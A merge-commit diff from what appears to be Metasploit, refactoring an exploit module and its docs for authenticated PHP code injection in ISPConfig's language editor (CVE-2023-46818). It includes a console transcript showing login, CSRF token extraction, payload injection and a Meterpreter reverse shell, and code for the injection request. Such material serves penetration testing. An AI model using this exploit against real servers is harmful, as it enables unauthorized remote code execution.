Merge pull request #1 from msutovsky-r7/collab/cve-2023-46818

Refactors and updates the docs

Author: happybear-21

documentation/modules/exploit/linux/http/ispconfig_lang_edit_php_code_injection.md

@@ -32,43 +32,35 @@ The ISPConfig administrator username to authenticate with.
 ### PASSWORD
 The ISPConfig administrator password to authenticate with.
 
-### LOGIN_TIMEOUT
-Timeout for login request (default: 15 seconds).
-
-### DELETE_SHELL
-Whether to delete the webshell after exploitation (default: true).
 
 ## Scenarios
 
 ### ISPConfig 3.2.11 (or earlier), Ubuntu 20.04
 
 ```
-msf6 > use exploit/linux/http/ispconfig_lang_edit_php_code_injection
-msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set rhosts 192.168.1.100
-rhosts => 192.168.1.100
-msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set username admin
-username => admin
-msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > set password adminpass
-password => adminpass
-msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run
-
-[*] Started reverse TCP handler on 192.168.1.1:4444
-[*] Running automatic check ('set AutoCheck false' to disable)
-[+] ISPConfig installation detected
-[*] Attempting login with username 'admin' and password 'adminpass'
+msf6 exploit(linux/http/ispconfig_lang_edit_php_code_injection) > run verbose=true
+[*] Started reverse TCP handler on 192.168.168.128:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if the target is ISPConfig...
+[*] Attempting login with username 'admin' and password 'RGT2WvpoALJXh8t'
+[+] Login successful!
+[+] ISPConfig version detected: ISPConfig Version: 3.2.10
+[+] The target appears to be vulnerable. Version: ISPConfig Version: 3.2.10
+[*] Attempting login with username 'admin' and password 'RGT2WvpoALJXh8t'
 [+] Login successful!
-[*] Injecting PHP shell...
-[+] CSRF tokens extracted: ID=abc123..., KEY=def456...
-[+] Shell successfully injected: sh_xxxxx.php
-[*] Starting payload handler...
-[+] PHP payload triggered
-[*] Waiting for session...
-[+] Shell responsive: uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
-id
-uid=33(www-data) gid=33(www-data) groups=33(www-data)
-uname -a
-Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+[*] Checking if admin_allow_langedit is enabled...
+[+] Language editor is accessible - admin_allow_langedit appears to be enabled
+[*] Injecting PHP payload...
+[+] Extracted CSRF tokens: ID=language_ed..., KEY=86845285663...
+[*] Sending stage (40004 bytes) to 192.168.168.186
+[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.186:58822) at 2025-07-07 11:51:12 +0200
+
+
+meterpreter >
+meterpreter > sysinfo
+Computer    : server1
+OS          : Linux server1 6.8.0-60-generic #63~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 22 19:00:15 UTC 2 x86_64
+Meterpreter : php/linux
 ```
 
 ## Notes

modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

@@ -194,7 +194,7 @@ def enable_langedit_permission
       'keep_cookies' => true
     })
 
-    if res && res.code == 200
+    if res&.code == 200
       print_good('Successfully enabled admin_allow_langedit')
       return true
     else
@@ -237,16 +237,12 @@ def inject_payload
       '_csrf_key' => csrf_key,
       'records[\]' => injection
     }
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
       'uri' => edit_url,
       'vars_post' => injection_data,
       'keep_cookies' => true
     })
-    fail_with(Failure::UnexpectedReply, 'Injection request failed') unless res
-    payload_url = normalize_uri(target_uri.path, 'admin', @payload_file)
-    print_good("Payload successfully injected: #{@payload_file}")
-    return payload_url
   end
 
   def exploit
@@ -269,10 +265,6 @@ def exploit
       end
     end
 
-    payload_url = inject_payload
-    print_status('Starting payload handler...')
-    print_status('Manual trigger information:')
-    print_line("URL: #{full_uri}#{payload_url}")
-    print_line("Manual trigger: curl '#{full_uri}#{payload_url}'")
+    inject_payload
   end
 end